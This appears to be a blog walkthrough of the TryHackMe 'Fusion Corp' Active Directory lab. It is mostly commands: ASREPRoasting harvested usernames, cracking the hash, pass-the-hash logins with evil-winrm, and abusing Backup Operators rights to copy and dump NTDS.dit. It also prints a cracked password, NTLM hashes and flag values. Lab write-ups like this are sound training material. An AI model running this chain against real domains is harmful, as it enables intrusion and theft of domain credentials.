TL;DR Walkthrough of the TryHackMe Fusion Corp room.
A full list of our TryHackMe walkthroughs and cheatsheets is here.
Background
I had just gotten around to finally consolidating our notes on using Windows VMs from Kali here when I noticed the Fusion Corp room. It’s a good ‘by the numbers’ enumeration, initial access, pivot, and escalate exercise. I refined and updated my notes along the way.
I’ll start with the hints as that may be all others need if they’re stuck:
- Enumerate the website, there’s a username list hidden in it
- ASREPRoast the usernames
- Enumerate AD once you gain initial access
- Once you find the account to pivot to, check its privileges
- Remember that Backup Operators can backup, copy, and dump NTDS.dit
Like many other THM VMs, this one kept becoming non-functional after 1 hour and I’d have to restart it. Hence the target IP changes during the walkthrough.
Scanning & enumeration
As always start with nmap.
sudo nmap -sV -O 10.10.217.197
One will notice right away that the target is a DC for the corp.local domain and that it’s running a webserver.
Let’s see if there’s any useful info on the website.
#Enumerate for hidden directories using dirb
dirb http://10.10.217.197 /usr/share/wordlists/dirb/common.txt
We get a directory named backup with an employee name & username list. Nice, we don’t have to run Mishka’s Mangler. We can just feed the names into Kerbrute and/or ASREPRoast.
#Pull the usernames from the list
Set-Location ".\THM stuff\THM Writeups\Fusion Corp"
$RawThings = Get-Content .\Raw.txt
ForEach($RawThing in $RawThings)
{
$Username = $RawThing.Split('')[2]
$Username | Out-File .\usernames.txt -Append
}
Copy/paste the contents of usernames.txt over to Kali & save them in a text file.
gedit /home/kali/Downloads/Wordlists/FusionCorpUsernames.txt
Gaining initial access
Add the target to the hosts file so Kali knows what IP to use for the domain name.
sudo gedit /etc/hosts
10.10.217.197 fusion.corp
ASREPRoast and see if we get lucky.
/home/kali/Downloads/impacket-master/build/scripts-3.9/GetNPUsers.py fusion.corp/ -no-pass -usersfile /home/kali/Downloads/Wordlists/FusionCorpUsernames.txt
I attempted cracking with hashcat, but with no joy.
hashcat -m 18200 ‘$krb5asrep$23$lparker@FUSION.CORP:75cf284e2ec240d109cd0adef095cd96$2bfbf7f9ae13ae6f3ab82c31baa28dd3213bf6a062f8d39e71a5fd7812e806a9a8c2610a5502517156b35c56f34ebb12bf5c809232607871ab4a52571d0d06581133bc59817d1a2590f76e534ace00f997f117c61b559c711748fec04235127898c678b38d7f3aa33b9deffea94c02f577be3b02bb4bf3b9ca400e556ffe79c684ec4923d521eee224ba32f24e48a32d581e6e5dbd6588502441c89d1a95e533e3c5fa4909e1e0a9e34194985f717abe9812605365307fbdbccd3dce5bd5d68b16676e5439a8af14889923b9417a1c459884e9d454ce4693923a84bde09ecdb3eab78b9ec83d116e8fd2’ -a 3 rockyou.txt
However john cracked it no problem.
john --wordlist=/home/kali/Downloads/Wordlists/rockyou.txt /home/kali/Downloads/hashes/Fusion
We get lparker \ !!abbylvzsvs2k6!
I checked for shares with crackmapexec. Remember that you have to escape special characters like ! in BASH by using a \ before them.
crackmapexec smb 10.10.21.236 -u lparker -p \!\!abbylvzsvs2k6\! --shares
smbclient \\\\10.10.21.236\\NETLOGON -U fusion.corp\\lparker --password \!\!abbylvzsvs2k6\!
There wasn’t anything interesting or useful on NETLOGON or SYSVOL however. One always wants to check these though as careless sysadmins and CTFs will both often leave plaintext credentials in logon scripts.
I realized a nifty trick around this time that I will probably use again; copy\paste the plaintext password into https://codebeautify.org/ntlm-hash-generator and get the NTLM. You can then PTH and login without having to escape characters.
evil-winrm -i 10.10.21.236 -u lparker -H 5A2ED7B4BB2CD206CC884319B97B6CE8
Get-ADUser -Filter * -Properties * | Select-Object SamAccountName, Description
Pivot
Let’s login as jmurphy after converting that password to NTLM.
evil-winrm -i 10.10.208.148 -u jmurphy -H 69C62E471CF61441BB80C5AF410A17A3
whoami /priv
whoami /groups
Backup Operators can backup the hard drive and then copy files from the backup. This means Backup Operators can access NTDS.dit, download it to Kali, and dump it offline. We ran a lab project on doing this with secretsdump and DSInternals here.
Create a backup.txt on Kali containing:
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
Then via evil-winrm logged in as jmurphy:
New-Item -Type Directory C:\Temp
Set-Location C:\Temp
upload /home/kali/Downloads/exploits/backup.txt
diskshadow /s backup.txt
#Once that's done
robocopy /b E:\Windows\ntds . ntds.dit
reg save hklm\system c:\temp\system
download ntds.dit /home/kali/Downloads/Pilfered/Fusion/ntds.dit
download C:\Temp\system /home/kali/Downloads/Pilfered/Fusion/system
#Dump NTDS.dit offline on Kali
cd /home/kali/Downloads/Pilfered/Fusion
python3 /home/kali/Downloads/impacket-master/examples/secretsdump.py -ntds ntds.dit -system system LOCAL
Escalate privileges
We can now login as the Administrator and quickly find all the flags.
evil-winrm -i 10.10.208.148 -u Administrator -H 9653b02d945329c7270525c4c2a69c67
Get-ChildItem -Path C:\Users -Recurse -ErrorAction SilentlyContinue | Select-String "THM{"
C:\Users\Administrator\Desktop\flag.txt:1:THM{f72988e57bfc1deeebf2115e10464d15}
C:\Users\jmurphy\Desktop\flag.txt:1:THM{b4aee2db2901514e28db4242e047612e}
C:\Users\lparker\Desktop\flag.txt:1:THM{c105b6fb249741b89432fada8218f4ef}
lparker is of course user 1, jmurphy is 2, and the Administrator is 3.
Summary
This room was good practice overall. I learned a new trick and updated my cheatsheet for enumerating, attacking, and connecting to Windows domains from Kali.
References
smbclient syntax: https://www.samba.org/samba/docs/current/man-html/smbclient.1.html
Backup Operators & dumping NTDS.dit offline: https://happycamper84.medium.com/securing-ad-backups-8804b31da9fd
Handy table of hashcat mode mapped to hash type: https://hashcat.net/wiki/doku.php?id=example_hashes